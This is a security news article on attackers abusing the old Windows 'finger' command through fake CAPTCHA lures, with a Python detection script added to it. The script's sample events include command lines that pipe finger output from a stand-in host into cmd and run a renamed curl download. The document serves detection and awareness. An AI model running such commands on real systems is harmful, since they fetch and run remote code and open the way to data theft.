👤 WHITEHAWK
🗓️ 26 Nov 2025  

Ghosts in the Terminal: How the Forgotten “finger” Command Became a Hacker’s Secret Weapon

Ancient tech meets modern cybercrime as hackers revive a relic of the early internet to slip past Windows defenses and steal data in plain sight.

Fast Facts

  • The “finger” command, once used to look up user info on networks, is being exploited in new Windows cyberattacks.
  • Attackers use finger to secretly download and launch malicious tools, bypassing many security systems.
  • Victims are tricked into running commands, often masked by fake CAPTCHAs or verification requests.
  • Recent attacks include data theft attempts and remote control software installation.
  • Security experts warn that overlooked legacy features can become dangerous backdoors.

The Resurrection of a Digital Fossil

Picture a dusty, long-abandoned railway switch. Most would assume it’s harmless, forgotten, and safe to ignore. But what if someone figured out it still controls a hidden track? That’s the story of the “finger” command - a relic from the dawn of the internet - now being reanimated by hackers to quietly hijack modern Windows machines.

“Finger” was once a helpful tool for network administrators, designed to fetch basic details about users on Unix and, later, Windows systems: who was logged in, where their home directory was, and so on. But as the internet matured, finger gathered cobwebs, fading into near-obsolescence. Most people forgot it even existed. Cybercriminals, however, see opportunity in obscurity.

How Hackers Tap Into the Past

Recent investigations, including detailed findings by the MalwareHunterTeam and reports on Reddit, reveal a crafty new infection scheme. Attackers lure victims - sometimes with fake CAPTCHA popups or “identity verification” requests - into running seemingly harmless commands via the Windows command prompt. Unbeknownst to the user, these commands use finger to reach out to a remote server and fetch further instructions.

What happens next is a digital sleight of hand. The finger command’s output is piped directly into Windows’ command interpreter (cmd), launching a cascade of actions: temporary folders are created, legitimate system tools like curl are copied and renamed, and disguised malware - sometimes in the form of a fake PDF - slides onto the computer. In some cases, Python scripts are unpacked and executed without the user noticing, initiating data theft or opening a remote control channel for attackers.

To evade detection, these scripts even check for the presence of analysis and monitoring tools like Process Explorer or Wireshark. If the coast is clear, the script presses on; if not, it quietly aborts, leaving few traces.
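
The chain described above can be looked for in process-creation logs. The following is an added example, not code from the researchers or the reports cited here: the events are constructed, their field names are modelled on Sysmon process-creation records, and the rule names are hypothetical.

```python
import ntpath
import re

# Constructed process-creation events; field names are modelled on Sysmon
# Event ID 1 (Image, OriginalFileName, CommandLine). Hosts and paths are made up.
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "original": "Cmd.Exe",
     "cmdline": r'cmd /c "finger user@finger.example.invalid | cmd"'},
    {"image": r"C:\Windows\System32\finger.exe", "original": "finger.exe",
     "cmdline": "finger user@finger.example.invalid"},
    {"image": r"C:\Users\a\AppData\Local\Temp\x7\doc.exe", "original": "curl.exe",
     "cmdline": "doc.exe -o out.bin https://files.example.invalid/x"},
    {"image": r"C:\Windows\System32\curl.exe", "original": "curl.exe",
     "cmdline": "curl.exe --version"},
    {"image": r"C:\Windows\System32\finger.exe", "original": "finger.exe",
     "cmdline": "finger"},
]

# finger queried against a remote host (user@host argument).
FINGER_REMOTE = re.compile(r"\bfinger(?:\.exe)?\b[^|&]*@[\w.-]+", re.I)
# finger output piped straight into the command interpreter.
FINGER_PIPED = re.compile(r"\bfinger(?:\.exe)?\b[^|]*\|\s*cmd(?:\.exe)?\b", re.I)
# System tools whose copies under another file name are worth flagging.
WATCHED_ORIGINALS = {"curl.exe"}

def classify(event):
    """Return the (hypothetical) rule names that one event triggers."""
    hits = []
    cmd = event["cmdline"]
    if FINGER_PIPED.search(cmd):
        hits.append("finger_output_piped_to_cmd")
    elif FINGER_REMOTE.search(cmd):
        hits.append("finger_remote_query")
    # A renamed copy keeps its embedded original file name.
    name = ntpath.basename(event["image"]).lower()
    orig = event["original"].lower()
    if orig in WATCHED_ORIGINALS and name != orig:
        hits.append("renamed_" + orig)
    return hits

def scan(events):
    """Return (index, rule names) for every event that triggers a rule."""
    results = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]

if __name__ == "__main__":
    for index, hits in scan(EVENTS):
        print(index, hits, EVENTS[index]["cmdline"])
```

The plain local `finger` call and the unrenamed `curl.exe` are left alone; only the remote query, the pipe into cmd and the renamed copy are reported.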

Why Old Tricks Work

The genius of this attack lies in its use of a channel that most security systems and IT staff have stopped watching. Since finger traffic is rare and often ignored, it’s the digital equivalent of a burglar using a forgotten service entrance. This isn’t the first time attackers have weaponized legacy tools - similar tactics have been seen with old protocols like Telnet or NetBIOS, but finger’s revival is especially sneaky due to its near-invisibility.

While the specific malicious servers uncovered by researchers have been taken down, the method is spreading. It’s a stark reminder that in cybersecurity, nothing ever truly disappears - and that the past, left unguarded, can become the future’s greatest weakness.

As the line between old and new blurs, defenders must learn from history: even the most forgotten tools can be turned against us. The next time you see a relic command in your system, don’t assume it’s harmless. Someone, somewhere, may already be pulling its hidden levers.

WIKICROOK

  • Finger command: The Finger command is an old network tool for looking up basic user details, like login status, on local or remote systems.
  • Command prompt (cmd): The command prompt (cmd) is a Windows tool that lets users control their computer by typing commands instead of using a mouse or menus.
  • Remote code execution: Remote code execution lets attackers run commands on your computer from a distance, often leading to full system compromise and data theft.
  • CAPTCHA: A CAPTCHA is a security test on websites that helps tell humans from bots, often by asking users to solve simple puzzles or identify images.
  • NetSupport Manager: NetSupport Manager is remote control software for IT support, but it can also be exploited by hackers to access computers without permission.

WHITEHAWK
Cyber Intelligence Strategist